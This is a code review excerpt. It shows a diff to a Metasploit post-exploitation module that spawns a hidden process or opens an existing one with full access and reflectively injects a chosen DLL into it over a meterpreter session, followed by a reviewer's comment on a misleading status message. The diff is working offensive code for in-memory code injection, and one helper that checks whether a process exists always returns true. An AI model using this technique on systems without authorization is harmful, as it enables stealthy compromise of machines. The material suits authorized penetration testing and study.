modules/post/windows/manage/reflective_dll_inject.rb

```diff
@@ -6,45 +6,167 @@
+                      'Author' => 'Ben Campbell,b4rtik',
+                      'Platform' => 'win',
+                      'SessionTypes' => ['meterpreter'],
+                      'References'   =>
+                        [
+                          [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ]
+                        ]))
     register_options(
       [
-        OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']),
-        OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']),
-      ])
+        OptPath.new('PATH', [true, 'Reflective DLL to inject into memory of a process.']),
+        OptInt.new('PID', [false, 'Pid  to inject', 0]),
+        OptString.new('PROCESS', [false, 'Process to spawn','notepad.exe']),
+        OptString.new('ARGUMENTS', [false, 'Command line arguments']),
+        OptInt.new('WAIT', [false, 'Time in seconds to wait.', 0])
+      ], self.class
+    )
   end
 
-  # Run Method for when run command is issued
   def run
-    # syinfo is only on meterpreter sessions
+    dll_path = gen_dll_path
+    if File.file?(dll_path)
+      client.response_timeout=20
+      run_dll(dll_path)
+    else
+      print_bad("Dll not found #{dll_path}")
+    end
+  end
+
+  def gen_dll_path
+    dll_path = ::File.expand_path(datastore['PATH'])
+    dll_path
+  end
+
+  def sanitize_process_name(process_name)
+    out_process_name = if process_name.split(//).last(4).join.eql? '.exe'
+                         process_name
+                       else
+                         process_name + '.exe'
+                       end
+    out_process_name
+  end
+
+  def pid_exists(pid)
+    return true
+  end
+
+  def launch_process
+    process_name = sanitize_process_name(datastore['PROCESS'])
+    print_status("Launching #{process_name} to inject Dll...")
+    channelized = if datastore['WAIT'] != 0
+                    true
+                  else
+                    false
+                  end
+
+    process = client.sys.process.execute(process_name, nil,
+                                                 'Channelized' => true,
+                                                 'Hidden' => true)
+    hprocess = client.sys.process.open(process.pid,
+                                      PROCESS_ALL_ACCESS)
+    print_good("Process #{hprocess.pid} launched.")
+    [process, hprocess]
+  end
+
+  def inject_dll(process,dll_path)
+    print_status("Reflectively injecting the DLL into #{process.pid}..")
+    library_path = ::File.expand_path(dll_path)
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+    [exploit_mem, offset]
+  end
+
+  def hook_process
+    print_status('Warning: output unavailable')
+    print_status("Hooking #{datastore['PID']} to be injected Dll...")
+    hprocess = client.sys.process.open(datastore['PID'],
+                                      PROCESS_ALL_ACCESS)
+    print_good("Process #{hprocess.pid} hooked.")
```

Comment:
Technically you've just opened a handle to the process, you haven't hooked anything here so the message is a bit misleading.

Reply:
You are right, I will fix this.